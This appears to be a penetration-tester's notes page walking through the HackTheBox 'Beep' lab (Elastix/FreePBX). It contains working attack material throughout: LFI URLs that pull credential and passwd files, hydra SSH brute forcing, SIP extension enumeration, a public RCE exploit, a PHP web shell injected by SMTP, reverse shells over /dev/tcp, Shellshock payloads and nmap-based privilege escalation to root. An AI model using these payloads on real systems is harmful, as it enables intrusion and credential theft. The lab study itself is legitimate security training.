Elastix FreePBX

Elastix LFI graph.php

Elastix version: FreePBX 2.8.14
google "elastix vulnerabilities"
Elastix 2.2.0 graph.php
amportal.conf - Config file target will give up the Creds
If you find user/pw - fire up and crack it

searchsploit elastix
searchsploit -m 37637   ..copy LFI

https://$IP/vtigercrm/graph.php?current_language
=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
=../../../../../../../..//etc/passwd%00&module=Accounts&action

Ignore users with nologin
vim > :g/nologin/d

Fix formatting:
tr '#' '\n' < input.txt > output.txt
grep -i -E 'user|pass|host|name' output.txt

hydra -L users.txt -P pass.txt ssh://$IP

Passwords found here.. could be used as 'root' :)
(beep htb)

Elastix LFI vtigercrm

vTiger CRM 5.1.0
gobuster found 'vtigercrm' folder
searchsploit vtiger found: Local File Inclusion - 18770.txt

https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=english.php HTTP/1.1
?module_name=../../../../../../../../etc/passwd%00
?module_name=../../../../../../../../proc/self/status%00
?module_name=../../../../../../../../var/mail/askerisk%00

View Page Source!
Found: uid:100:asterisk, passwd, mail-read

PBX Extensions

SIPVicious: Find active 'extensions' by wardialing your PBX
sudo apt install sipvicious

> svmap 10.129.113.87 -vv

+--------------------+---------------------+-------------+
| SIP Device         | User Agent          | Fingerprint |
+====================+=====================+=============+
| 10.129.113.87:5060 | FPBX-2.8.1(1.8.7.0) | disabled    |
+--------------------+---------------------+-------------+

> svwar -h
> svware $IP
> svwar -D -m INVITE $IP
> svwar -D -m INVITE $IP -e100-300 --force

+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+

Remote Code Execution

FreePBX 2.8.14
searchsploit freepbx 2.8.14
Found: 2.10.10 / Elastix 2.2.0 - Remote Code Execution: php/webapps: 18650.py
- Did you read the notes?
- Elastix often allows us to run nmap with interactive

searchsploit -m 18650
vim 18650

lhost = $MyIP
rhost = $IP
extension='1000'      ..default extension
extension='238'       ..found with svware
url = 'https://....'
urllib.urlopen(url)   ..original
print(url)            ..to troubleshoot

nc -nvlp 4444
whoami 
asterisk

sudo nmap --interactive
nmap> !sh
id ..root

Email php injection

Requires:
- smtp:25 open
- user/pass of email account
- LFI that can open/execute under same account

-------------
smtp:25
telnet $IP	
EHLO mutatedknutz.beep.localdomain   ..extended hello
VRFY hacked@localhost    ..rejected
VRFY asterisk@localhost  ..connect!
mail from:hacked@hacked.com
rcpt to:askerisk@localhost
data
Subject:Testing!
Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.
quit

-------------
Use LFI to pull mail/file:
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=../../../../../../../../var/mail/askerisk%00 
&command=whoami HTTP/1.1
&command=hostname HTTP/1.1
&command=bash -i >& /dev/tcp/10.x.x.x/5151 0>&1 HTTP/1.1
Update as: URL Encoded (with burp)

nc -nvlp 5151
whoami
asterisk !!

Metasploit

Optional method: "vtiger soap upload"
MSF SSL Issue/Fix: 6783

searchsploit vtigercrm
msf: vtiger_soap_upload

() { :;}; echo; /usr/bin/wget https://$IP      ..test
() { :;}; bash -i >& /dev/tcp/$IP/443 0>&1     ..reverse

PreviousDrupal NextHttpFileServer (HFS)

Last updated 2 years ago

Was this helpful?